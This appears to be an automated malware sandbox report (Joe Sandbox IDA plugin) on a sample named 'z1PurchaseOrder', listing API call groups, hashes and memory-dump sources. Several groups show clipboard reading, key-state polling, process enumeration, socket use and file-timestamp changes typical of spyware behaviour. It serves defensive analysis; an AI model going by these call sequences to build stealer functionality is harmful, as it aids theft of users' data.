                                        • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                        APIs
                                        • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                        • OleInitialize.OLE32(00000000), ref: 0047AE06
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                        • _wcslen.LIBCMT ref: 0047AE18
                                        • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                        • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                        • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                        • String ID: HH
                                        • API String ID: 1915432386-2761332787
                                        • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                        • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                        • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                        • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DEFINE$`$h$h
                                        • API String ID: 0-4194577831
                                        • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                        • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                        • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                        • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                        • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                        • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                        • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketsocket
                                        • String ID:
                                        • API String ID: 2609815416-0
                                        • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                        • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                        • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                        • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                        • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                        • __wsplitpath.LIBCMT ref: 004370A5
                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                        • _wcscat.LIBCMT ref: 004370BA
                                        • __wcsicoll.LIBCMT ref: 004370C8
                                        • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                        • String ID:
                                        • API String ID: 2547909840-0
                                        • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                        • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                        • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                        • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                        • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                        • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                        • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextSleep_wcslen
                                        • String ID: *.*
                                        • API String ID: 2693929171-438819550
                                        • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                        • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                        • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                        • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                        APIs
                                        • OpenClipboard.USER32(?), ref: 0046C635
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                        • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                        • CloseClipboard.USER32 ref: 0046C65D
                                        • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                        • CloseClipboard.USER32 ref: 0046C692
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                        • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                        • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                        • CloseClipboard.USER32 ref: 0046C866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                        • String ID: HH
                                        • API String ID: 589737431-2761332787
                                        • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                        • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                        • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                        • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                        APIs
                                        • __wcsicoll.LIBCMT ref: 0043643C
                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                        • __wcsicoll.LIBCMT ref: 00436466
                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsicollmouse_event
                                        • String ID: DOWN
                                        • API String ID: 1033544147-711622031
                                        • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                        • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                        • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                        • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                        APIs
                                          • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                        • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorLastinet_addrsocket
                                        • String ID:
                                        • API String ID: 4170576061-0
                                        • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                        • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                        • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                        • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                        APIs
                                        • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                        • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                        • GetAsyncKeyState.USER32(?), ref: 004563D0
                                        • GetAsyncKeyState.USER32(?), ref: 004563DC
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                        • String ID:
                                        • API String ID: 3539004672-0
                                        • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                        • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                        • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                        • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                        APIs
                                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                        • IsWindowVisible.USER32 ref: 00477314
                                        • IsWindowEnabled.USER32 ref: 00477324
                                        • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                        • IsIconic.USER32 ref: 0047733F
                                        • IsZoomed.USER32 ref: 0047734D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                        • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                        • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                        • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                        • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                        • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                        • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                        • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _strncmp
                                        • String ID: ACCEPT$^$h
                                        • API String ID: 909875538-4263704089
                                        • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                        • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                        • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                        • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                        • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                        • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                        • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                        • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                        • FindClose.KERNEL32(00000000), ref: 00436B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirst
                                        • String ID:
                                        • API String ID: 48322524-0
                                        • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                        • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                        • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                        • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                        APIs
                                        • __time64.LIBCMT ref: 004433A2
                                          • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                          • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Time$FileSystem__aulldiv__time64
                                        • String ID: rJ
                                        • API String ID: 2893107130-1865492326
                                        • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                        • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                        • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                        • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                        APIs
                                        • __time64.LIBCMT ref: 004433A2
                                          • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                          • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Time$FileSystem__aulldiv__time64
                                        • String ID: rJ
                                        • API String ID: 2893107130-1865492326
                                        • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                        • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                        • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                        • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 901099227-0
